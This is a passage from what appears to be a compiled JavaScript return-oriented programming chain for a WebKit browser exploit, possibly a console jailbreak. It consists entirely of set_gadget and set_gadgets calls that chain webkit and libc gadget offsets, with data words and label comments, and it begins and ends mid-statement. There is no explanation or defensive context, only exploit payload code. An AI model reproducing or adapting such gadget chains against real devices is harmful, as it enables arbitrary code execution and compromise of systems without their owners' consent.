0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4254: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+237208, //L4256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+237256, //L4259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+237224, //L4257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4256: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4257: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4258: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4259: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+237368, //L4260+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+237360, //L4260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4260: db([0, 0]); // 0x0 set_gadgets([ ropchain+237384, //L4260+24 ropchain+240664, //L4255 libc_base+764760, //pop rsi ropchain+237424, //L4261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4261: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4263: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+237544, //L4266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237528, //L4264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4264: db([0, 0]); 
// 0x0 set_gadget(libc_base+144605,); //pop rdi //L4266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+237688, //L4269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237656, //L4267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+237672, //L4268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4267: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4268: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4269: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+237776, //L4271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4270: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L4271: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+237832, //L4272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4274: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+237912, //L4276 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4276: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+237992, //L4277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov 
rax, r8 libc_base+763368 //pop rcx ]); //L4277: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4279: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+238112, //L4282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238096, //L4280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4280: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4282: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+238272, //L4287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+238288, //L4288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238224, //L4284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4284: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4285: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4286: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4287: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4288: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+238400, //L4289+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+238392, //L4289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4289: db([0, 0]); // 0x0 set_gadgets([ ropchain+238416, //L4289+24 ropchain+239672, //L4283 libc_base+764760, //pop rsi ropchain+238456, //L4290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L4290: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4292: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+238576, //L4295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238560, //L4293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4293: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4295: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+238752, //L4298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+238768, //L4299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238720, //L4296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238736, //L4297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4296: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4297: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4298: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4299: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+238928, //L4303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238896, //L4301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+238912, //L4302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4300: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4301: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); 
//pop rdi //L4302: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4303: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+239032, //L4305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239016, //L4304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4305: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+239128, //L4307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4306: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4307: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4308: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+239232, //L4309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239248, //L4310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4309: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4310: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+239416, //L4312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239432, //L4313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+239400, //L4311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4311: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4312: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4313: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+239576, //L4316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239592, //L4317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239544, //L4314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4314: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4315: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4316: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4317: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+239664, //L4318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4318: db([0, 0]); // 0x0 //L4283: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+239792, //L4321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239808, //L4322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+239776, //L4320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4320: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4321: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4322: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+239920, //L4324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239968, //L4327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239936, //L4325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4324: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4325: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4326: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4327: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+240080, //L4328+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+240072, //L4328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4328: db([0, 0]); // 0x0 set_gadgets([ ropchain+240096, //L4328+24 ropchain+240664, //L4323 libc_base+764760, //pop rsi ropchain+240136, //L4329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4329: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4331: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240256, //L4334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240240, //L4332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4332: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4334: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi 
ropchain+240400, //L4337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240368, //L4335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+240384, //L4336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4335: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4337: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+240488, //L4339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4338: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L4339: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240544, //L4340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4340: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4342: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+240624, //L4344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4344: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4323: //L4255: libc_base+764760, //pop rsi ropchain+240704, //L4345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4345: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4347: db([72, 0]); // 0x48 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240824, //L4350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240808, //L4348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4348: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4350: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+241000, //L4353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241016, //L4354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240968, //L4351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+240984, //L4352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4351: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4352: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4353: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4354: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+241176, //L4358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+241144, //L4356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241160, //L4357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4355: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4356: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4357: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4358: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+241280, //L4360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241264, //L4359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4359: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4360: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+241376, //L4362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4361: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4362: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4363: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+241480, //L4364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241496, //L4365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4364: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4365: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+241664, //L4367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241680, //L4368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+241648, //L4366 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4366: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4367: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4368: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+241840, //L4373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241856, //L4374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241792, //L4370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4370: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4371: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4372: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4373: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4374: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+241968, //L4375+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+241960, //L4375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4375: db([0, 0]); // 0x0 set_gadgets([ ropchain+241984, //L4375+24 ropchain+243336, //L4369 libc_base+764760, //pop rsi ropchain+242024, //L4376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4376: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4378: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+242144, //L4381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+242128, //L4379 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4379: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4381: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+242320, //L4384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+242336, //L4385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+242288, //L4382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+242304, //L4383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4382: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4383: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4384: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4385: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+242432, //L4387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+242416, //L4386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4387: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4388: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4389: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L4390: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov 
rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+242632, //L4392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4392: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+242688, //L4393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4393: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+242824, //L4397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+242808, //L4396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4395: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4397: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+242944, //L4400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+242912, //L4398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4398: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4400: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+243080, //L4402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop 
rsi ropchain+243096, //L4403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243064, //L4401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4401: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4403: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+243240, //L4406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243256, //L4407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+243208, //L4404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4404: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4405: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4406: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4407: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, 